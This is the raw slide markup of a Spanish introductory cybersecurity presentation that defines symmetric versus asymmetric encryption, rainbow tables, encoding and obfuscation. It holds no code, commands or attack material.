                    <a:lstStyle/>
                    <a:p>
                      <a:pPr algn="ctr"/>
                      <a:r>
                        <a:rPr lang="es-ES" sz="1600">
                          <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Cifrado asimétrico</a:t>
                      </a:r>
                    </a:p>
                  </a:txBody>
                  <a:tcP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solidFill>
                      <a:srgbClr val="355A79"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1666645465"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="784702">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="es-ES" sz="1600" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Uso de </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-ES" sz="1600" b="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>una sola clave </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-ES" sz="1600" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>para cifrar y descifrar datos.</a:t>
                      </a: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tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="es-ES" sz="1600" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Uso de una </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-ES" sz="1600" b="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>clave pública </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-ES" sz="1600" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>para cifrar los datos, y una </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-ES" sz="1600" b="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>clave privada </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-ES" sz="1600" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>para descifrar la información.</a:t>
                      </a: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extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2611224374"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="552198">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="es-ES" sz="1600">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Garantiza la </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-ES" sz="1600" b="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>confidencialidad</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-ES" sz="1600">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>.</a:t>
                      </a:r>
                      <a:endParaRPr lang="es-ES" sz="1600" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRP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tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="es-ES" sz="1600">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Garantiza la </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-ES" sz="1600" b="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>confidencialidad</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-ES" sz="1600">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-ES" sz="1600" b="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>autenticidad </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-ES" sz="1600">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>y </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-ES" sz="1600" b="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>no repudio</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-ES" sz="1600">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>.</a:t>
                      </a:r>
                      <a:endParaRPr lang="es-ES" sz="1600" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRP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extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="1980953423"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="552198">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="es-ES" sz="1600">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Es </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-ES" sz="1600" b="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>rápido</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-ES" sz="1600">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>, pero tiene el riesgo de compartir de forma segura la clave.</a:t>
                      </a:r>
                      <a:endParaRPr lang="es-ES" sz="1600" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRP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tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="es-ES" sz="1600">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Es </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-ES" sz="1600" b="1">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>más lento</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-ES" sz="1600">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>, pero no tiene riesgo de compartir la clave.</a:t>
                      </a:r>
                      <a:endParaRPr lang="es-ES" sz="1600" dirty="0">
                        <a:solidFill>
                          <a:srgbClr val="000000"/>
                        </a:solidFill>
                        <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                      </a:endParaRP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extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="2212789393"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
              <a:tr h="342656">
                <a:tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="es-ES" sz="1600" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Ejemplos algoritmos: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-ES" sz="1600" b="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>AES</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-ES" sz="1600" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>, DES, 3DES.</a:t>
                      </a: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tc>
                  <a:txBody>
                    <a:bodyPr/>
                    <a:lstStyle/>
                    <a:p>
                      <a:r>
                        <a:rPr lang="es-ES" sz="1600" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>Ejemplos algoritmos: </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-ES" sz="1600" b="1" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>RSA</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="es-ES" sz="1600" dirty="0">
                          <a:solidFill>
                            <a:srgbClr val="000000"/>
                          </a:solidFill>
                          <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                        </a:rPr>
                        <a:t>, DSA.</a:t>
                      </a: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extLst>
                  <a:ext uri="{0D108BD9-81ED-4DB2-BD59-A6C34878D82A}">
                    <a16:rowId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" val="541076526"/>
                  </a:ext>
                </a:extLst>
              </a:tr>
            </a:tbl>
          </a:graphicData>
        </a:graphic>
      </p:graphicFrame>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Imagen 3" descr="Interfaz de usuario gráfica&#10;&#10;El contenido generado por IA puede ser incorrecto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5FF1F5CF-32B2-4F90-C83C-7F112463211D}"/>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48734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C28DD-37C2-587D-0AC7-B2E209DABB5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0E15DCC-B48C-CFFE-174D-C95A198CE7EF}"/>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1AC5EC0-98B8-5FAD-1CC4-C5F3100736BA}"/>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Conceptos técnicos de Ciberseguridad</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="20" name="Imagen 19" descr="Texto&#10;&#10;El contenido generado por IA puede ser incorrecto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D358A011-7BFA-4F1D-D600-4291FF17F47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6" name="Rectángulo 35">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4E8A14D3-9045-20D1-3895-1D24625C1AA6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="378148" y="944938"/>
            <a:ext cx="9737666" cy="1692771"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="193330"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Tablas de arcoíris</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Tablas más potentes para el crackeo de hash. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Especialmente creadas y utilizadas para recuperar una contraseña.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" sz="1800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" sz="1800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" sz="1400" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="75000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="37" name="Imagen 36">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5FAD3570-8305-523A-563E-40681168D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571" y="1846806"/>
            <a:ext cx="3675342" cy="2053868"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38" name="CuadroTexto 37">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AAEB97A0-77CB-967C-D710-4F422A408CF3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="476384" y="3936670"/>
            <a:ext cx="8705716" cy="1200329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="193330"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Codificar</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cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Transformar los datos para que puedan ser consumidos y explotados de forma correcta por otro sistema.</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cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Ejemplo de uso de la codificación con motivación maliciosa.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="39" name="CuadroTexto 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{91F04633-9FB1-2081-E912-B69D79DDBA04}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2241699" y="5268641"/>
            <a:ext cx="6010564" cy="738664"/>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a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Referencias: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="1400">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI"/>
              </a:rPr>
              <a:t>Tablas de arcoíris</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI"/>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1400" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>Rainbow</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI"/>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t> tables, creación y uso (cracking hash)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI"/>
              </a:rPr>
              <a:t>Codificar</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI"/>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI"/>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>Uso</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI"/>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t> de la </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI"/>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>codificación</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI"/>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t> con </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI"/>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>motivación</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI"/>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" err="1">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI"/>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>maliciosa</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:solidFill>
                  <a:schemeClr val="accent6"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Segoe UI"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="3" name="Imagen 2" descr="Interfaz de usuario gráfica&#10;&#10;El contenido generado por IA puede ser incorrecto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D6B8D283-5F57-7300-8BB9-3F49DC6C8948}"/>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095671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B5221-755D-2A41-74FD-ED38677296D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5C574BC-26F7-D3E0-0B86-20EE532FC11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7414314-69E2-072D-1B95-51BE3D786199}"/>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Conceptos técnicos de Ciberseguridad</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="20" name="Imagen 19" descr="Texto&#10;&#10;El contenido generado por IA puede ser incorrecto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{38BEE46F-7E20-6085-E841-9D1866D0A3D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929B702F-806F-AD9C-C2E7-F7FC7E78F897}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="429768" y="1084529"/>
            <a:ext cx="9737666" cy="3970318"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="t">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="193330"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Ofuscar</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rPr>
              <a:t>Consiste en </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>dificultar la posibilidad de entendimiento </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>de unos datos o de un componente software sin afectar a su funcionalidad.</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rPr>
              <a:t>Ejemplo: impedir la copia de software. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" sz="1800" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="B31166"/>
              </a:solidFill>
              <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" sz="1800" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="B31166"/>
